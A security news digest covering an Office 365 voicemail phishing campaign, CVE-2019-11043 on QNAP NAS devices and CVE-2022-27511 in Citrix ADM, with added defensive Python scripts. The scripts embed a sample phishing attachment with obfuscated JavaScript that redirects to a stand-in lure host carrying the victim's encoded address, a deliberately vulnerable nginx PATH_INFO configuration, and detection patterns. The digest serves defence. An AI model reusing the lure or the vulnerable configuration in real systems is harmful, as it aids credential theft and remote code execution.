Attackers are running phishing campaigns against multiple organizations in the U.S. to steal Microsoft Office 365 and Outlook credentials. The lure is a fake voicemail notification carrying an HTML attachment. The messages are sent through email services in Japan with the sender address spoofed so that each email appears to come from the targeted organization itself. The attachment's file name includes a music note character so that it passes for a sound clip; opening it runs obfuscated JavaScript that sends the victim to a phishing site. The redirection first lands on a CAPTCHA check, placed there to keep automated anti-phishing crawlers from reaching the final page, and only then on the phishing page that harvests the victim's Office 365 credentials.
Mitigation- Frequent employee training can help; users should confirm that they are on a legitimate login portal (the expected domain in the address bar, over HTTPS) before they start typing a username and password. Because the spoofed sender is the target's own domain, enforcing DMARC on that domain and blocking or sandboxing HTML attachments at the mail gateway removes most of this campaign's reach before a user sees it.
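The mail-gateway checks implied above (sender alignment against SPF/DKIM/DMARC results, plus inspection of HTML attachments for obfuscated redirect scripts) are shown here as an added Python example; this is not code from the original report or from any vendor. The message, domains and attachment are constructed to mirror the described lure, and the script patterns are heuristics rather than a full signature.

```python
import json
import re
import email
from email.utils import parseaddr

# Constructed sample message modelled on the lure described above: the From
# address is spoofed to the recipient's own domain, SPF/DKIM/DMARC fail, and the
# attachment is an HTML file whose name starts with a music note (RFC 2231
# encoded) so it passes for a sound clip. All domains are fictitious.
RAW_MESSAGE = """\
From: "Voicemail Service" <voicemail@example-corp.test>
To: jane.doe@example-corp.test
Subject: New voice message (0:42)
Authentication-Results: mx.example-corp.test; spf=fail smtp.mailfrom=example-corp.test; dkim=none; dmarc=fail header.from=example-corp.test
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="us-ascii"

You received a new voice message. Open the attachment to listen.

--b1
Content-Type: text/html; charset="us-ascii"
Content-Disposition: attachment; filename*=UTF-8''%E2%99%AA%20voicemail-0512.html

<html><body><p>Loading voice message, please wait...</p>
<script>
var h = "%68%74%74%70%73%3a%2f%2f" + "verify-captcha.example-lure.test/?u=";
window.location.replace(unescape(h) + atob("amFuZS5kb2VAZXhhbXBsZS1jb3JwLnRlc3Q="));
</script></body></html>
--b1--
"""

MUSIC_NOTES = "\u266a\u266b\u266c\u2669"  # the note characters used as "sound clip" decoration
HTML_EXT = re.compile(r"\.(?:html?|shtml|xhtml)$", re.I)
JS_OBFUSCATION = re.compile(r"unescape\(|atob\(|eval\(|String\.fromCharCode|\\x[0-9a-fA-F]{2}")
JS_REDIRECT = re.compile(r"(?:window\.)?location\.(?:href|replace|assign)|window\.location\s*=")
AUTH_RESULT = re.compile(r"\b(spf|dkim|dmarc)=(\w+)")


def domain_of(header_value):
    """Lower-cased domain of the first address in a From/To header."""
    addr = parseaddr(header_value or "")[1]
    return addr.rpartition("@")[2].lower()


def auth_results(header_value):
    """Parse 'spf=fail ...; dkim=none; dmarc=fail' into {mechanism: result}."""
    return {mech.lower(): res.lower() for mech, res in AUTH_RESULT.findall(header_value or "")}


def attachment_flags(filename, content):
    """Heuristic indicators for one attachment: HTML type, note in name, obfuscation, redirect."""
    flags = []
    if HTML_EXT.search(filename):
        flags.append("html_attachment")
    if any(ch in MUSIC_NOTES for ch in filename):
        flags.append("music_note_in_name")
    if JS_OBFUSCATION.search(content):
        flags.append("js_obfuscation")
    if JS_REDIRECT.search(content):
        flags.append("js_redirect")
    return flags


def triage(raw_message):
    """Return the indicators found in a raw RFC 822 message and a deliver/quarantine verdict."""
    msg = email.message_from_string(raw_message)
    results = auth_results(msg.get("Authentication-Results"))
    failures = [f"{m}={r}" for m, r in results.items() if r != "pass"]
    from_dom, to_dom = domain_of(msg.get("From")), domain_of(msg.get("To"))
    # "From our own domain" but DMARC did not pass is exactly the spoof pattern of this campaign.
    spoofed = bool(from_dom) and from_dom == to_dom and results.get("dmarc", "none") != "pass"

    attachments = []
    for part in msg.walk():
        if part.get_content_disposition() != "attachment":
            continue
        name = part.get_filename() or ""
        body = (part.get_payload(decode=True) or b"").decode("utf-8", "replace")
        attachments.append({"name": name, "flags": attachment_flags(name, body)})

    # An HTML attachment that redirects or decodes its payload at runtime is the lure itself.
    dangerous = any("html_attachment" in a["flags"]
                    and ({"js_redirect", "js_obfuscation"} & set(a["flags"]))
                    for a in attachments)
    return {
        "auth_failures": failures,
        "spoofed_own_domain": spoofed,
        "attachments": attachments,
        "verdict": "quarantine" if (spoofed or dangerous) else "deliver",
    }


if __name__ == "__main__":
    print(json.dumps(triage(RAW_MESSAGE), indent=2, ensure_ascii=False))
```

Either indicator on its own (a same-domain sender failing DMARC, or an HTML attachment that decodes and redirects at runtime) is enough to quarantine; the CAPTCHA stage happens only after the click, so the gateway never sees the final phishing page and must decide on the message and attachment alone.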
Critical PHP Vulnerability Exposes QNAP NAS Devices to Remote Attacks
A critical PHP vulnerability exposes QNAP NAS devices to remote code execution. The flaw, tracked as CVE-2019-11043 and rated 9.8 out of 10 on the CVSS scale, affects PHP 7.1.x before 7.1.33, 7.2.x before 7.2.24, and 7.3.x before 7.3.11 when PHP-FPM is served through nginx with an improper configuration (a location block that derives PATH_INFO with fastcgi_split_path_info and passes it to PHP-FPM). A remote, unauthenticated attacker can then execute code on the device. The attack succeeds only where nginx and php-fpm are running on appliances using the following QNAP operating systems: QTS 5.0.x and later, QTS 4.5.x and later, QuTS hero h5.0.x and later, QuTS hero h4.5.x and later, QuTScloud c5.0.x and later, and QuTScloud c4.5.x and later.
Mitigation- Upgrade to the newest version of the QTS, QuTS hero, or QuTScloud operating system. On any nginx/php-fpm host that cannot be patched immediately, a try_files guard that rejects requests for scripts that do not exist on disk blocks the known exploitation path.
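The configuration precondition is worth checking on every nginx/php-fpm host, not only QNAP appliances. The Python below is an added example (not QNAP's or the PHP project's code) that pulls each location block out of an nginx config and flags the ones that pass PATH_INFO from fastcgi_split_path_info to PHP-FPM without a try_files guard. The two server blocks are constructed for the example; the hardened one adds the guard. This is a heuristic scan, not a full nginx parser: included files are not followed.

```python
import re

# Constructed nginx server block (not QNAP's shipped configuration) with the
# PATH_INFO handling that CVE-2019-11043 requires: PATH_INFO is derived by
# fastcgi_split_path_info and handed to PHP-FPM with no try_files check.
VULNERABLE_CONF = r"""
server {
    listen 80;
    root /share/Web;
    index index.php;

    location /static/ {
        try_files $uri =404;
    }

    location ~ [^/]\.php(/|$) {
        fastcgi_split_path_info ^(.+?\.php)(/.*)$;
        fastcgi_param PATH_INFO $fastcgi_path_info;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass unix:/var/run/php-fpm.sock;
        include fastcgi_params;
    }
}
"""

# Hardened variant: the same block with a try_files guard, so a request whose
# script is not a real file on disk gets a 404 instead of reaching PHP-FPM.
HARDENED_CONF = VULNERABLE_CONF.replace(
    r"fastcgi_split_path_info ^(.+?\.php)(/.*)$;",
    r"fastcgi_split_path_info ^(.+?\.php)(/.*)$;" + "\n        try_files $fastcgi_script_name =404;",
)

LOCATION = re.compile(r"location\s+([^{]+)\{")
SPLIT_PATH_INFO = re.compile(r"\bfastcgi_split_path_info\b")
PASSES_PATH_INFO = re.compile(r"\bfastcgi_param\s+PATH_INFO\s+\$fastcgi_path_info\b")
FASTCGI_PASS = re.compile(r"\bfastcgi_pass\b")
TRY_FILES_GUARD = re.compile(r"\btry_files\b[^;]*=404")


def location_blocks(conf):
    """Yield (header, body) for every location block, matching braces so nested blocks stay intact."""
    blocks = []
    for m in LOCATION.finditer(conf):
        depth, i = 1, m.end()
        while i < len(conf) and depth:
            depth += {"{": 1, "}": -1}.get(conf[i], 0)
            i += 1
        blocks.append((m.group(1).strip(), conf[m.end():i - 1]))
    return blocks


def audit_nginx(conf):
    """Return headers of location blocks that hand PATH_INFO to PHP-FPM without a try_files guard."""
    risky = []
    for header, body in location_blocks(conf):
        if not FASTCGI_PASS.search(body):
            continue  # not a PHP-FPM location, so PATH_INFO handling is irrelevant here
        if (SPLIT_PATH_INFO.search(body) and PASSES_PATH_INFO.search(body)
                and not TRY_FILES_GUARD.search(body)):
            risky.append(header)
    return risky


if __name__ == "__main__":
    for label, conf in (("vulnerable", VULNERABLE_CONF), ("hardened", HARDENED_CONF)):
        print(label, "->", audit_nginx(conf) or "no risky PHP locations")
```

A hit from this scan means the configuration half of the precondition is present; whether the host is actually exploitable still depends on the PHP-FPM version being in the affected ranges listed above.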
Citrix ADM Vulnerability Lets Remote Attackers Reset the Administrator Password
An advisory from Citrix explains that this vulnerability in Citrix Application Delivery Management (ADM), an improper access control flaw tracked as CVE-2022-27511, can be abused to trigger a reset of the administrator password at the next device reboot. A remote, unauthenticated attacker could first crash the system (a denial-of-service condition) and then, once the appliance has rebooted, anyone with SSH access to it can log in with the default administrator credentials.
Mitigation- Upgrade to Citrix ADM 13.1-21.53, Citrix ADM 13.0-85.19, or later releases. Citrix also recommends that network traffic to the ADM IP address be segmented from standard traffic, so that the management interface and SSH are not reachable from untrusted networks even if a reset is forced.
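Both advisories on this page state their fix as "at least version X on branch Y", and a naive string comparison gets that wrong (13.0-85.19 is a fix, 13.1-21.52 is not, even though "13.1" sorts after "13.0"). The Python below is an added example, not Citrix's or QNAP's tooling, that compares a reported version against the fixed release for its own branch; it serves both the Citrix ADM item and the PHP-FPM ranges in the QNAP item. The inventory is constructed and the host names are hypothetical.

```python
import re

# Fixed releases named in the two advisories summarized on this page, keyed by
# release branch (the first two numeric components of the version string).
CITRIX_ADM_FIXED = {"13.1": "13.1-21.53", "13.0": "13.0-85.19"}  # CVE-2022-27511
PHP_FIXED = {"7.1": "7.1.33", "7.2": "7.2.24", "7.3": "7.3.11"}   # CVE-2019-11043
FIXED_VERSIONS = {"citrix-adm": CITRIX_ADM_FIXED, "php": PHP_FIXED}


def version_tuple(version):
    """Numeric components of a version string: '13.1-21.53' -> (13, 1, 21, 53)."""
    return tuple(int(x) for x in re.findall(r"\d+", version))


def branch_of(version):
    """Release branch, i.e. the first two numeric components: '7.3.10' -> '7.3'."""
    return ".".join(str(n) for n in version_tuple(version)[:2])


def is_fixed(version, fixed_by_branch):
    """True if version is at or past the fix for its branch, False if older,
    None if the branch is not in the table (the advisory does not cover it)."""
    fixed = fixed_by_branch.get(branch_of(version))
    if fixed is None:
        return None
    return version_tuple(version) >= version_tuple(fixed)


# Constructed inventory of (host, product, reported version); hosts are hypothetical.
INVENTORY = [
    ("adm-prod-01", "citrix-adm", "13.1-21.53"),
    ("adm-lab-02", "citrix-adm", "13.0-84.11"),
    ("nas-fileshare", "php", "7.3.10"),
    ("nas-backup", "php", "7.4.2"),
]


def assess(inventory):
    """Map each host to 'patched', 'VULNERABLE' or 'unknown-branch'."""
    labels = {True: "patched", False: "VULNERABLE", None: "unknown-branch"}
    return {host: labels[is_fixed(ver, FIXED_VERSIONS[product])]
            for host, product, ver in inventory}


if __name__ == "__main__":
    for host, status in assess(INVENTORY).items():
        print(f"{host:15} {status}")
```

A branch that is absent from the table is reported as unknown rather than patched: for PHP that covers 7.4 and later, which the advisory does not list, and for ADM it would catch a build from a branch neither advisory line mentions, which should be checked against the vendor rather than assumed safe.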